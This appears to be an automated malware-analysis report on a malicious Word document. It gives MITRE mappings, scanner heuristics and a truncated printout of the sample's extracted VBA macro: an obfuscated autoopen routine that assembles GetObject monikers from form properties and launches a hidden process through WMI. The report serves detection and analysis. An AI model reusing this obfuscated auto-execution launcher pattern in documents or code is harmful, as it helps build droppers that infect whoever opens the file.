Verdict: MALICIOUS (risk score 222)

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution. Caveat: T1203 covers exploitation of a vulnerability in a client application; nothing in this report shows an exploit, only a macro the user must allow to run, so the observed behaviour maps more precisely to T1204.002 User Execution: Malicious File (and to T1047 Windows Management Instrumentation if the WMI launch described below is confirmed).

Malware Insights
The sample is a malicious Word document carrying a VBA project of three modules: the document class (FDQQAQU, based on Normal.ThisDocument), a UserForm (QAwoBA, whose VB_Base attribute carries the form class GUIDs) and a standard module (tUDAGcB) that holds the autoopen procedure Word runs when the file is opened. autoopen executes under On Error Resume Next, so every runtime error is swallowed, and its real work is three statements buried between blocks of padding (comparisons of uninitialized variables and meaningless arithmetic on them): GetObject is called on a string assembled at runtime from properties of the form (QAwoBA.Tag + QAwoBA.<name> + QAwoBA.Tag), the returned object's ShowWindow property is set to 0 (written as 653418 - 653418), and a second GetObject(...).Create call is made with more assembled strings. That sequence matches the WMI launch idiom (a winmgmts: moniker for Win32_ProcessStartup with a hidden window, then Win32_Process.Create), but the monikers and the command line live in the form's control properties, which are not part of the extracted source, so the exact command is not recoverable from this preview. The pattern strongly suggests a launcher for a secondary payload, most likely a command interpreter or downloader spawned through WMI. The ClamAV detection 'Doc.Malware.Sagent-6905131-0' supports the verdict.
Heuristics (7)

- ClamAV: Doc.Malware.Sagent-6905131-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Malware.Sagent-6905131-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]. Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]. The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened (subject to the user's macro security setting).
- GetObject call [high, OLE_VBA_GETOBJ]. The macro calls GetObject, which returns an automation object from a moniker string; with a winmgmts: moniker this is the usual route to WMI process creation.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: in this sample a VBA project was in fact recovered (see the extracted macros.bas), so treat this marker as corroborating the AutoOpen finding rather than as separate evidence.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). Caveat: this is the standard OOXML DrawingML namespace URI present in ordinary Office files and is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16681 bytes | 2b91d7f22d6448ddcc7d0a3d52ef8930c8f69253501fb1f28048e73d8c48c06f |
Preview: first 1,000 lines of the extracted script (macros.bas), shown as extracted.
Attribute VB_Name = "FDQQAQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QAwoBA"
Attribute VB_Base = "0{7789F2E6-62A2-4646-A3C3-723DE1135562}{99993612-0FDF-4C24-A1FA-7178E3EF96CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "tUDAGcB"
Sub autoopen()
On Error Resume Next
If GQXAA4X = hUZAZ_ Then
Z1kGD__ = CLng(GUDA_Q)
i_QAUcA = (475094571 + Round(IAcZQACA * Tan(847534544 / Chr(387364199 / CDbl(CU1AZQGA) * wGBcAB / CDbl(787278656)))) * 316603097 * Atn(506004067 / Oct(185768600) - 447858864 * Int(P14Aww)) * (299926762 - Atn(pAUA4B)))
ooGck1GQ = Int(TQoA1AU - tA_Bo_Qo - 949747137 * Int(590024526))
End If
If zBBAABAD = NQcDcA Then
AZ1BwAA = CLng(DQAAAD)
vX_AABB = (428436593 + Round(zUwQAZQ * Tan(697033302 / Chr(928121779 / CDbl(SXkcABB) * AAcAAQ / CDbl(367376090)))) * 191273810 * Atn(91136492 / Oct(680070942) - 743255129 * Int(EAGCQA)) * (761414307 - Atn(XDwQcDA)))
zUAQBUZ_ = Int(S4AoAw - PGAA1A_U - 616683060 * Int(510362690))
End If
If t4AGB44 = SAcDwkU Then
oUABAo = CLng(QAoAAQA)
FDUocX = (470169163 + Round(oZ__AQD * Tan(760713983 / Chr(862052139 / CDbl(BXAAA1) * iAAwAAx1 / CDbl(631938304)))) * 241148997 * Atn(816517910 / Oct(194808809) - 781847182 * Int(FoAB4DGB)) * (917613214 - Atn(CCAAQGCQ)))
h1Q1UwAQ = Int(Z1XCDA_A - twZCkD - 260656822 * Int(487749829))
End If
Set QZG4Dc = GetObject(QAwoBA.Tag + QAwoBA.dc_ADQQ + QAwoBA.Tag)
If ADAxZX = BwAAxB1 Then
TQAcAUCB = CLng(nAkBA_BA)
uUAAkcU = (948604921 + Round(OU4GAo * Tan(381966661 / Chr(154519126 / CDbl(SXAU1BAU) * JXUACGA / CDbl(380013627)))) * 865188282 * Atn(270924934 / Oct(663937777) - 2722352 * Int(bDXAAQD)) * (676066561 - Atn(HUowkAA)))
mBAUcUwU = Int(a1DGXo - Y_wZZADZ - 244949078 * Int(768778317))
End If
If Dx4ZAQA = nAwwAU Then
YkACAkB = CLng(owQoAAA)
hU_CUCUw = (710488077 + Round(zkAoUAD * Tan(714814942 / Chr(613906231 / CDbl(mAAAwAAx) * zAAUAZAU / CDbl(232495916)))) * 690945694 * Atn(400895268 / Oct(370287543) - 508487259 * Int(pAZ_XUAQ)) * (729718886 - Atn(HAAQAG)))
w_D_ZADA = Int(aDCAAUx - pkAkAAo - 366394389 * Int(85437247))
End If
If zDQXAB = iAUAAD Then
Z4ABUDXA = CLng(tGDBCD)
LAw1AcA = (677379943 + Round(iAoUBZ * Tan(123238215 / Chr(13114302 / CDbl(ZAo_D4CA) * tAXABA / CDbl(641106669)))) * 199320602 * Atn(347689828 / Oct(854140575) - 569849350 * Int(v_GA_ABA)) * (926084038 - Atn(CBAACAxA)))
VAccBko = Int(hk_CccU - FAACU1o - 275192518 * Int(465985620))
End If
QZG4Dc.ShowWindow = 653418 - 653418
If uUAUDBGA = DAwADwA Then
uB1AAAAQ = CLng(fwDAUC)
O_AAAA = (706417597 + Round(MQCAZ1Aw * Tan(407704938 / Chr(602440240 / CDbl(i_QADA) * tQQAD_B1 / CDbl(846612236)))) * 805320179 * Atn(496467376 / Oct(212091178) - 337618206 * Int(zUADCAA)) * (289361389 - Atn(tGxAAG)))
FxUcADA = Int(U4k1AG - vAQAADA_ - 743541609 * Int(229178934))
End If
If OAU_AcZ_ = ooAAw_ Then
MUxA4k = CLng(OoA_BQ)
zAAkQA1 = (324761347 + Round(loGZAAA * Tan(50991180 / Chr(525461008 / CDbl(FA4cAGAA) * NoAAZAD / CDbl(473736356)))) * 437955870 * Atn(100832857 / Oct(703244509) - 354457907 * Int(fAQQBUQ)) * (993878222 - Atn(t4_AAkGA)))
YxCDBAGB = Int(GQAXDx - iUUAAC - 276669998 * Int(893179218))
End If
If HXkACwoA = SUCACAAD Then
CcBAX1A = CLng(hGAA44AG)
jA_XBkG = (377038642 + Round(KAwoUGA * Tan(360203537 / Chr(368232154 / CDbl(IkocAAD) * vZwAGBB / CDbl(809368170)))) * 259953767 * Atn(625990650 / Oct(530014528) - 901692812 * Int(hUAAAC)) * (439904732 - Atn(Lc_C4X)))
iAAAUAAX = Int(SDADQQ - iAUXDw - 226450403 * Int(197576277))
End If
GetObject(QAwoBA.Tag + QAwoBA.ZXUA4c + QAwoBA.Tag). _
Create QAwoBA.Tag + QAwoBA.iABABo14 + QAwoBA.Tag + QAwoBA.
... (truncated)